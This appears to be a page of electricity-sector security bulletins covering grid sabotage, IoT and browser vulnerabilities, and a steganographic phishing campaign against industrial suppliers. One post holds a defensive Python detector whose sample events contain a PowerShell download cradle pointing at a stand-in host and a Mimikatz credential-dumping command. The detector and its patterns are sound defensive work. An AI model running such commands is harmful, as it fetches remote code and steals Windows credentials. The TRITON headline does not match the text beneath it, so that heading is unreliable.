FireEye TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers
In a previous blog post FireEye detailed the TRITON intrusion that impacted industrial control systems (ICS) at a critical infrastructure facility in the Middle East. In this blog post FireEye provides additional information linking the threat group's activity surrounding the TRITON intrusion to a Russian government-owned research institute.
Details: Recent open source articles have noted a few incidents resulting in power outages in Zimbabwe, Bangladesh, and Venezuela. While these are international incidents, they are of interest because the tactics could be an inspiration to those who wish to sabotage the electric grid in North America, and because they are a reminder of the damage that can be done.
Bangladesh: In an apparent sabotage effort, nine electric meters caught on fire in four separate locations in Bagerhat. All fires occurred simultaneously after midnight within a quarter of a kilometer from each other. The fire was not due to any short circuit or fault.
Zimbabwe: Transformer vandalism and theft has resulted in power outages over the past week, particularly in Marlborough. Residents have noted that the outages have affected businesses, caused a lack of water, reduced their ability to use facilities, and created other health hazards. The Zimbabwe Electricity Supply Authority (ZESA) noted that it takes about five months to replace transformers due to lack of funds. Over 2,200 transformers have been stolen across the country.
Venezuela: Most of the country faced an approximate 7-hour blackout starting on November 29, affecting 23 of 24 states. The power company, Corpoelec, claimed that there was sabotage at a hydroelectric plant that caused the blackout, though additional details have not been released.
E-ISAC Analyst Note: While this did not take place in North America and the E-ISAC has not seen any evidence that these incidents will spark actions in North America, it is important to maintain awareness of incidents such as these, as they emphasize the impact of vandalizing electricity-related infrastructure.
If further information becomes available, it will be added as an update to this post.
This article, written by researcher Brian Krebs, describes critical security flaws that can expose security cameras and internet-capable consumer electronic devices to eavesdropping, credential theft, and remote compromise. The flaws include a weakness in peer-to-peer (P2P) communications technology and several other critical vulnerabilities.
The flawed software was developed by China-based Shenzhen Yunni Technology and is bundled with millions of Internet of Things (IoT) devices, including security cameras and webcams, baby monitors, smart doorbells, and digital video recorders. These types of devices are attractive to consumers because of their remote-access capabilities and ease of installation. This kind of ease of use and convenience can sometimes cost consumers in security and privacy; the article describes these costs in great detail.
Leaked Huawei Employment Records May Show Links to Chinese Military and Intelligence Agencies
According to The Telegraph, leaked information from Huawei staff's CVs showed some employees had links to China's Military and Intelligence Community. The article details that some employees trained at China's military academy, served as agents of the Ministry of State Security and collaborated with the Chinese People's Liberation Army.
In May of 2020, cyber security firm Kaspersky reported a form of malware allegedly targeting the supply chains of industrial organizations in the energy sector in Italy, the UK and Germany.
Initial delivery is through a phishing email specifically catered to its target that contains a malicious MS Office document. When a user interacts with the document, a script is triggered that downloads an image containing the new malware hidden inside it. Using steganography to hide code in images is a known attack technique because of its effectiveness; code embedded in images is difficult for antivirus and other IDS devices to detect. The image file then executes a PowerShell script that eventually leverages Mimikatz to steal Windows credentials.
Potential impacts from targeted malware of this nature can result in disclosure of legitimate network credentials to an adversary. Adversaries use these credentials to “live off the land” in a target’s environment in part because misuse of legitimate network credentials is difficult to detect.
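As an added, defender-side illustration (not code from the Kaspersky report or from this post), the following Python checker runs over constructed Sysmon-style process-creation events and flags the stages of the chain described above: an Office application spawning a script host, a PowerShell download cradle that fetches an image file, and Mimikatz keywords on the command line. The event format, the sample values, and the ATT&CK technique IDs attached to each rule are my own assumptions.

```python
import json
import ntpath
import re

# Parents that should rarely spawn a script host, and the script hosts of interest.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line rules: (ATT&CK technique, description, regex). Technique IDs are my own mapping.
CMDLINE_RULES = [
    ("T1059.001", "PowerShell download cradle",
     re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)),
    ("T1027.003", "script fetches an image file (possible steganographic payload)",
     re.compile(r"https?://\S+\.(?:png|jpe?g|gif|bmp)\b", re.I)),
    ("T1003.001", "Mimikatz credential-theft keyword",
     re.compile(r"mimikatz|sekurlsa::", re.I)),
]

# Constructed sample telemetry (Sysmon-like JSON lines, not real events); the third line is benign.
SAMPLE_EVENTS = r"""
{"host": "ws01", "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/logo.jpg')"}
{"host": "ws01", "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe -c Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'"}
{"host": "ws02", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe Get-Service"}
"""

def analyze(event):
    """Return (technique, reason) hits for one process-creation event."""
    hits = []
    parent = ntpath.basename(event.get("parent", "")).lower()
    image = ntpath.basename(event.get("image", "")).lower()
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append(("T1204.002", f"{parent} spawned {image}"))
    for technique, reason, rx in CMDLINE_RULES:
        if rx.search(event.get("cmd", "")):
            hits.append((technique, reason))
    return hits

def scan(jsonl):
    """Run analyze() over JSON-lines telemetry; return only the flagged events."""
    flagged = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hits = analyze(event)
        if hits:
            flagged.append({"host": event["host"], "image": event["image"], "hits": hits})
    return flagged
```

Running scan(SAMPLE_EVENTS) flags the first two events (the Office-to-PowerShell download of an image, then the Mimikatz invocation) and ignores the benign launch; in practice the rules would be fed from an EDR or SIEM export rather than an inline string.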
MITRE ATT&CK Mapping:
What to Do:
A robust and ongoing cyber security awareness program that includes training personnel on how to recognize and report phishing and suspicious emails can assist in stopping malicious emails from entering your environments. Additionally, evaluating and understanding the cyber security program at trusted suppliers is important in maintaining a relationship built on mutual trust.
Kovacs, Eduard (2020). Industrial Suppliers in Japan, Europe Targeted in Sophisticated Attacks. SecurityWeek. Retrieved May 28, 2020, from hXXps://www.securityweek.com/industrial-suppliers-japan-europe-targeted-sophisticated-attacks?&web_view=true
Goodin, Dan (2020). An advanced and unconventional hack is targeting industrial firms. Ars Technica. Retrieved May 30, 2020, from hXXps://arstechnica.com/information-technology/2020/05/an-advanced-and-unconventional-hack-is-targeting-industrial-firms/
Kaspersky ICS CERT (2020). Steganography in Targeted Attacks on Industrial Enterprises. Retrieved from hXXps://ics-cert.kaspersky.com/reports/2020/05/28/steganography-in-targeted-attacks-on-industrial-enterprises/
March Event - CYBER STRIKE WORKSHOP
The training will offer attendees a hands-on, simulated demonstration of a cyber-attack, drawing from elements of the December 2015 Ukraine cyber incident. The workshop will be conducted by utilizing a series of exercises/labs listed below that workshop attendees will have to work through in teams. Other topics that will be referenced include the North American Electric Reliability Corporation (NERC) alert related to the 2015 Ukraine cyber incident and the applicability of NERC Critical Infrastructure Protection (CIP) reliability standards* for such an incident. However, the primary focus will not be standards, but rather understanding the Ukraine cyber incident from a technical perspective to enhance cyber preparedness.
experts will come together to share ideas, methods, and techniques for defending control systems. In-depth presentations and interactive panel discussions will highlight real-world approaches that work and make a difference for the individuals fighting this fight every day.
Microsoft Addresses Critical Vulnerability in Remote Desktop Services with Patch to Include Unsupported Operating Systems
A potentially wormable, critical remote code execution vulnerability exists in Microsoft's Remote Desktop Services. This is documented in CVE-2019-0708. Microsoft has provided a patch to mitigate it; however, it is noteworthy that they have also provided a patch for older, unsupported operating system versions due to the severity of the vulnerability.
The vulnerability could potentially allow an unauthenticated attacker to execute arbitrary code on the target system with full administrative rights.
Because this vulnerability could allow wormable execution with no user interaction, the E-ISAC recommends researching the CVE and ensuring that any vulnerable systems in member environments are patched expeditiously.
Microsoft issued a public advisory yesterday in light of the need for many companies to suddenly shift to an increase in employees working from home in response to the global pandemic COVID-19. The article highlighted the importance of remaining productive without increasing cyber security risk. Some considerations highlighted include implementing official chat tools to allow for a proper communication channel for the workforce, utilization of Azure AD Conditional Access [hXXps://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview] to secure access to cloud applications, and the Azure AD Application Proxy [hXXps://docs.microsoft.com/en-us/azure/active-directory/manage-apps/what-is-application-proxy] for publishing on-premises applications for remote availability.
Due to the increase in remote work, it is highly likely that organizations will also see an increase in the use of personal devices accessing company data. Therefore, using Azure AD Conditional Access and Microsoft Intune app protection policies [hXXps://docs.microsoft.com/en-us/azure/active-directory/conditional-access/app-protection-based-conditional-access] together can help manage and protect corporate data in approved applications on these personal devices. One of the best ways to improve security for employees working from home is to use multi-factor authentication, such as Windows Hello biometrics and smartphone authentication apps like Microsoft Authenticator.
For the full report by Microsoft, please visit: hXXps://www.microsoft.com/security/blog/2020/03/12/support-working-from-home-securely/
On April 3, 2020, Mozilla announced that it had released security updates in order to patch critical vulnerabilities found in both Firefox and Firefox Extended Support Release (ESR) by security researchers with JMP Security.
Both vulnerabilities allow for race conditions which can cause a use-after-free issue. The first vulnerability, CVE-2020-6819, allows for a race condition when running the nsDocShell destructor (under certain conditions). The second vulnerability, CVE-2020-6820, allows for a race condition when handling a ReadableStream (under certain conditions).
According to the Department of Homeland Security Cybersecurity and Infrastructure Security Agency’s United States Computer Emergency Readiness Team (US-CERT) program, “an attacker could exploit these vulnerabilities to take control of an affected system.”
“Both bugs…allow remote attackers to execute arbitrary code or trigger crashes on machines running versions of Firefox prior to 74.0.1 and its business-friendly Firefox Extended Support Release 68.6.1,” a researcher at ThreatPost said.
Mozilla said that they are aware of both vulnerabilities being used in targeted attacks by hackers.
One of the researchers who discovered the vulnerabilities, Francisco Alonso, tweeted that “there is still lots of work to do and more details to be published (including other browsers). Stay tuned.”
It is highly recommended that all Firefox users download and apply the latest patches in order to protect themselves from exploitation of these critical vulnerabilities.
For additional information, please see the following sources:
Mozilla. Mozilla Foundation Security Advisory 2020-11. April 3, 2020. hXXps://www.mozilla.org/en-US/security/advisories/mfsa2020-11/
Mozilla. Firefox Update. April 3, 2020. hXXps://support.mozilla.org/en-US/kb/update-firefox-latest-release
DHS CISA US-CERT. Mozilla Patches Critical Vulnerabilities in Firefox, Firefox ESR. April 3, 2020. hXXps://www.us-cert.gov/ncas/current-activity/2020/04/03/mozilla-patches-critical-vulnerabilities-firefox-firefox-esr
Tom Spring. Firefox Zero-Day Flaws Exploited in the Wild Get Patched. April 4, 2020. hXXps://threatpost.com/firefox-zero-day-flaws-exploited-in-the-wild-get-patched/154466/
The E-ISAC has not established any specified threat to the electricity community based upon these vulnerabilities. However, as the information above and in the links indicates, the likelihood of adversarial action based upon this vulnerability is high. If this or any other adversarial action is experienced, contact the E-ISAC Watch Operations Team [mailto:operations[@]eisac.com], and create a Portal Post for instant community awareness.